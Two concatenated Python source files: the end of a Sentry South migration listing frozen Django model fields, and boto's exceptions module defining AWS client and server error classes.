'Meta': {'unique_together': "(('project', 'checksum'),)", 'object_name': 'Group', 'db_table': "'sentry_groupedmessage'"},
'active_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'db_column': "'view'", 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.NullBooleanField', [], {'default': 'False', 'null': 'True', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'db_index': 'True', 'blank': 'True'}),
'logger': ('django.db.models.fields.CharField', [], {'default': "'root'", 'max_length': '64', 'db_index': 'True', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'num_comments': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'resolved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'score': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'time_spent_count': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'time_spent_total': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '0'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '1', 'db_index': 'True'})
},
'sentry.groupassignee': {
'Meta': {'object_name': 'GroupAssignee', 'db_table': "'sentry_groupasignee'"},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'unique': 'True', 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'assignee_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_assignee_set'", 'to': "orm['sentry.User']"})
},
'sentry.groupbookmark': {
'Meta': {'unique_together': "(('project', 'user', 'group'),)", 'object_name': 'GroupBookmark'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'bookmark_set'", 'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'sentry_bookmark_set'", 'to': "orm['sentry.User']"})
},
'sentry.grouphash': {
'Meta': {'unique_together': "(('project', 'hash'),)", 'object_name': 'GroupHash'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.groupmeta': {
'Meta': {'unique_together': "(('group', 'key'),)", 'object_name': 'GroupMeta'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'value': ('django.db.models.fields.TextField', [], {})
},
'sentry.grouprulestatus': {
'Meta': {'unique_together': "(('rule', 'group'),)", 'object_name': 'GroupRuleStatus'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'rule': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Rule']"}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'})
},
'sentry.groupseen': {
'Meta': {'unique_together': "(('user', 'group'),)", 'object_name': 'GroupSeen'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project', 'group', 'key'),)", 'object_name': 'GroupTagKey'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value', 'group'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'grouptag'", 'null': 'True', 'to': "orm['sentry.Project']"}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.helppage': {
'Meta': {'object_name': 'HelpPage'},
'content': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_visible': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True'}),
'priority': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.lostpasswordhash': {
'Meta': {'object_name': 'LostPasswordHash'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.option': {
'Meta': {'object_name': 'Option'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'object_name': 'Organization'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'member_set'", 'to': "orm['sentry.Organization']"}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'blank': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.pendingteammember': {
'Meta': {'unique_together': "(('team', 'email'),)", 'object_name': 'PendingTeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'pending_member_set'", 'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'})
},
'sentry.project': {
'Meta': {'unique_together': "(('team', 'slug'), ('organization', 'slug'))", 'object_name': 'Project'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.projectkey': {
'Meta': {'object_name': 'ProjectKey'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'user_added': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "'keys_added_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.projectoption': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'ProjectOption', 'db_table': "'sentry_projectoptions'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
},
'sentry.release': {
'Meta': {'unique_together': "(('project', 'version'),)", 'object_name': 'Release'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.rule': {
'Meta': {'object_name': 'Rule'},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.tagkey': {
'Meta': {'unique_together': "(('project', 'key'),)", 'object_name': 'TagKey', 'db_table': "'sentry_filterkey'"},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.tagvalue': {
'Meta': {'unique_together': "(('project', 'key', 'value'),)", 'object_name': 'TagValue', 'db_table': "'sentry_filtervalue'"},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.team': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Team'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'owner': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.teammember': {
'Meta': {'unique_together': "(('team', 'user'),)", 'object_name': 'TeamMember'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"}),
'type': ('sentry.db.models.fields.bounded.BoundedIntegerField', [], {'default': '50'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'),)", 'object_name': 'UserOption'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {})
}
}
complete_apps = ['sentry']
|
|
# Copyright (c) 2006-2010 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010, Eucalyptus Systems, Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Exception classes - Subclassing allows you to check for specific errors
"""
import base64
import xml.sax
from boto import handler
from boto.resultset import ResultSet
class BotoClientError(StandardError):
"""
General Boto Client error (error accessing AWS)
"""
def __init__(self, reason, *args):
StandardError.__init__(self, reason, *args)
self.reason = reason
def __repr__(self):
return 'BotoClientError: %s' % self.reason
def __str__(self):
return 'BotoClientError: %s' % self.reason
class SDBPersistenceError(StandardError):
pass
class StoragePermissionsError(BotoClientError):
"""
Permissions error when accessing a bucket or key on a storage service.
"""
pass
class S3PermissionsError(StoragePermissionsError):
"""
Permissions error when accessing a bucket or key on S3.
"""
pass
class GSPermissionsError(StoragePermissionsError):
"""
Permissions error when accessing a bucket or key on GS.
"""
pass
class BotoServerError(StandardError):
def __init__(self, status, reason, body=None, *args):
StandardError.__init__(self, status, reason, body, *args)
self.status = status
self.reason = reason
self.body = body or ''
self.request_id = None
self.error_code = None
self.error_message = None
self.box_usage = None
# Attempt to parse the error response. If body isn't present,
# then just ignore the error response.
if self.body:
try:
h = handler.XmlHandler(self, self)
xml.sax.parseString(self.body, h)
except (TypeError, xml.sax.SAXParseException), pe:
# Remove unparsable message body so we don't include garbage
# in exception. But first, save self.body in self.error_message
# because occasionally we get error messages from Eucalyptus
# that are just text strings that we want to preserve.
self.error_message = self.body
self.body = None
def __getattr__(self, name):
if name == 'message':
return self.error_message
if name == 'code':
return self.error_code
raise AttributeError
def __repr__(self):
return '%s: %s %s\n%s' % (self.__class__.__name__,
self.status, self.reason, self.body)
def __str__(self):
return '%s: %s %s\n%s' % (self.__class__.__name__,
self.status, self.reason, self.body)
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name in ('RequestId', 'RequestID'):
self.request_id = value
elif name == 'Code':
self.error_code = value
elif name == 'Message':
self.error_message = value
elif name == 'BoxUsage':
self.box_usage = value
return None
def _cleanupParsedProperties(self):
self.request_id = None
self.error_code = None
self.error_message = None
self.box_usage = None
class ConsoleOutput:
def __init__(self, parent=None):
self.parent = parent
self.instance_id = None
self.timestamp = None
self.comment = None
self.output = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'instanceId':
self.instance_id = value
elif name == 'output':
self.output = base64.b64decode(value)
else:
setattr(self, name, value)
class StorageCreateError(BotoServerError):
"""
Error creating a bucket or key on a storage service.
"""
def __init__(self, status, reason, body=None):
self.bucket = None
BotoServerError.__init__(self, status, reason, body)
def endElement(self, name, value, connection):
if name == 'BucketName':
self.bucket = value
else:
return BotoServerError.endElement(self, name, value, connection)
class S3CreateError(StorageCreateError):
"""
Error creating a bucket or key on S3.
"""
pass
class GSCreateError(StorageCreateError):
"""
Error creating a bucket or key on GS.
"""
pass
class StorageCopyError(BotoServerError):
"""
Error copying a key on a storage service.
"""
pass
class S3CopyError(StorageCopyError):
"""
Error copying a key on S3.
"""
pass
class GSCopyError(StorageCopyError):
"""
Error copying a key on GS.
"""
pass
class SQSError(BotoServerError):
"""
General Error on Simple Queue Service.
"""
def __init__(self, status, reason, body=None):
self.detail = None
self.type = None
BotoServerError.__init__(self, status, reason, body)
def startElement(self, name, attrs, connection):
return BotoServerError.startElement(self, name, attrs, connection)
def endElement(self, name, value, connection):
if name == 'Detail':
self.detail = value
elif name == 'Type':
self.type = value
else:
return BotoServerError.endElement(self, name, value, connection)
def _cleanupParsedProperties(self):
BotoServerError._cleanupParsedProperties(self)
for p in ('detail', 'type'):
setattr(self, p, None)
class SQSDecodeError(BotoClientError):
"""
Error when decoding an SQS message.
"""
def __init__(self, reason, message):
BotoClientError.__init__(self, reason, message)
self.message = message
def __repr__(self):
return 'SQSDecodeError: %s' % self.reason
def __str__(self):
return 'SQSDecodeError: %s' % self.reason
class StorageResponseError(BotoServerError):
"""
Error in response from a storage service.
"""
def __init__(self, status, reason, body=None):
self.resource = None
BotoServerError.__init__(self, status, reason, body)
def startElement(self, name, attrs, connection):
return BotoServerError.startElement(self, name, attrs, connection)
def endElement(self, name, value, connection):
if name == 'Resource':
self.resource = value
else:
return BotoServerError.endElement(self, name, value, connection)
def _cleanupParsedProperties(self):
BotoServerError._cleanupParsedProperties(self)
        for p in ('resource',):
            setattr(self, p, None)
class S3ResponseError(StorageResponseError):
"""
Error in response from S3.
"""
pass
class GSResponseError(StorageResponseError):
"""
Error in response from GS.
"""
pass
class EC2ResponseError(BotoServerError):
"""
Error in response from EC2.
"""
def __init__(self, status, reason, body=None):
self.errors = None
self._errorResultSet = []
BotoServerError.__init__(self, status, reason, body)
self.errors = [ (e.error_code, e.error_message) \
for e in self._errorResultSet ]
if len(self.errors):
self.error_code, self.error_message = self.errors[0]
def startElement(self, name, attrs, connection):
if name == 'Errors':
self._errorResultSet = ResultSet([('Error', _EC2Error)])
return self._errorResultSet
else:
return None
def endElement(self, name, value, connection):
if name == 'RequestID':
self.request_id = value
else:
return None # don't call subclass here
def _cleanupParsedProperties(self):
BotoServerError._cleanupParsedProperties(self)
self._errorResultSet = []
        for p in ('errors',):
            setattr(self, p, None)
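# A minimal sketch (hypothetical XML body) of how the SAX handler populates
# an EC2ResponseError:
#
#     body = ('<Response><Errors><Error>'
#             '<Code>InvalidInstanceID.NotFound</Code>'
#             '<Message>Instance not found</Message>'
#             '</Error></Errors><RequestID>req-123</RequestID></Response>')
#     err = EC2ResponseError(400, 'Bad Request', body)
#     err.error_code  # -> 'InvalidInstanceID.NotFound'
#     err.request_id  # -> 'req-123'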
class JSONResponseError(BotoServerError):
"""
This exception expects the fully parsed and decoded JSON response
body to be passed as the body parameter.
:ivar status: The HTTP status code.
:ivar reason: The HTTP reason message.
:ivar body: The Python dict that represents the decoded JSON
response body.
:ivar error_message: The full description of the AWS error encountered.
:ivar error_code: A short string that identifies the AWS error
(e.g. ConditionalCheckFailedException)
"""
def __init__(self, status, reason, body=None, *args):
self.status = status
self.reason = reason
self.body = body
if self.body:
self.error_message = self.body.get('message', None)
self.error_code = self.body.get('__type', None)
if self.error_code:
self.error_code = self.error_code.split('#')[-1]
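# A minimal sketch (hypothetical decoded body) of the attributes derived
# in JSONResponseError.__init__:
#
#     body = {'__type': 'com.amazonaws.dynamodb.v20120810#'
#                       'ConditionalCheckFailedException',
#             'message': 'The conditional request failed'}
#     err = JSONResponseError(400, 'Bad Request', body)
#     err.error_code     # -> 'ConditionalCheckFailedException'
#     err.error_message  # -> 'The conditional request failed'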
class DynamoDBResponseError(JSONResponseError):
pass
class SWFResponseError(JSONResponseError):
pass
class EmrResponseError(BotoServerError):
"""
Error in response from EMR
"""
pass
class _EC2Error:
def __init__(self, connection=None):
self.connection = connection
self.error_code = None
self.error_message = None
def startElement(self, name, attrs, connection):
return None
def endElement(self, name, value, connection):
if name == 'Code':
self.error_code = value
elif name == 'Message':
self.error_message = value
else:
return None
class SDBResponseError(BotoServerError):
"""
Error in responses from SDB.
"""
pass
class AWSConnectionError(BotoClientError):
"""
General error connecting to Amazon Web Services.
"""
pass
class StorageDataError(BotoClientError):
"""
Error receiving data from a storage service.
"""
pass
class S3DataError(StorageDataError):
"""
Error receiving data from S3.
"""
pass
class GSDataError(StorageDataError):
"""
Error receiving data from GS.
"""
pass
class InvalidUriError(Exception):
"""Exception raised when URI is invalid."""
def __init__(self, message):
Exception.__init__(self, message)
self.message = message
class InvalidAclError(Exception):
"""Exception raised when ACL XML is invalid."""
def __init__(self, message):
Exception.__init__(self, message)
self.message = message
class InvalidCorsError(Exception):
"""Exception raised when CORS XML is invalid."""
def __init__(self, message):
Exception.__init__(self, message)
self.message = message
class NoAuthHandlerFound(Exception):
"""Is raised when no auth handlers were found ready to authenticate."""
pass
# Enum class for resumable upload failure disposition.
class ResumableTransferDisposition(object):
# START_OVER means an attempt to resume an existing transfer failed,
# and a new resumable upload should be attempted (without delay).
START_OVER = 'START_OVER'
# WAIT_BEFORE_RETRY means the resumable transfer failed but that it can
# be retried after a time delay within the current process.
WAIT_BEFORE_RETRY = 'WAIT_BEFORE_RETRY'
# ABORT_CUR_PROCESS means the resumable transfer failed and that
# delaying/retrying within the current process will not help. If
# resumable transfer included a state tracker file the upload can be
# retried again later, in another process (e.g., a later run of gsutil).
ABORT_CUR_PROCESS = 'ABORT_CUR_PROCESS'
# ABORT means the resumable transfer failed in a way that it does not
# make sense to continue in the current process, and further that the
# current tracker ID should not be preserved (in a tracker file if one
# was specified at resumable upload start time). If the user tries again
# later (e.g., a separate run of gsutil) it will get a new resumable
# upload ID.
ABORT = 'ABORT'
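# A sketch (hypothetical retry loop and helpers) of how callers are
# expected to branch on these dispositions:
#
#     try:
#         do_resumable_upload()
#     except ResumableUploadException as e:
#         if e.disposition == ResumableTransferDisposition.WAIT_BEFORE_RETRY:
#             time.sleep(delay)            # retry in this process
#         elif e.disposition == ResumableTransferDisposition.START_OVER:
#             restart_with_new_upload_id()
#         else:
#             raise                        # ABORT / ABORT_CUR_PROCESS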
class ResumableUploadException(Exception):
"""
Exception raised for various resumable upload problems.
self.disposition is of type ResumableTransferDisposition.
"""
def __init__(self, message, disposition):
Exception.__init__(self, message, disposition)
self.message = message
self.disposition = disposition
def __repr__(self):
return 'ResumableUploadException("%s", %s)' % (
self.message, self.disposition)
